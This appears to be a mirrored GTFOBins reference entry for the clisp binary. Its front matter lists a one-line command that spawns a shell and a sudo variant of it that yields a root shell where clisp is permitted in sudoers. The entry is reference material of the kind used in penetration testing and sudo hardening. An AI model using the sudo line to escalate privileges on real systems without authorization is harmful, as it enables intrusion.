mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-13 15:29:39 +01:00
8 lines
167 B
Markdown
8 lines
167 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: clisp -x '(ext:run-shell-command "sh") (ext:exit)'
|
|
sudo:
|
|
- code: sudo clisp -x '(ext:run-shell-command "sh") (ext:exit)'
|
|
---
|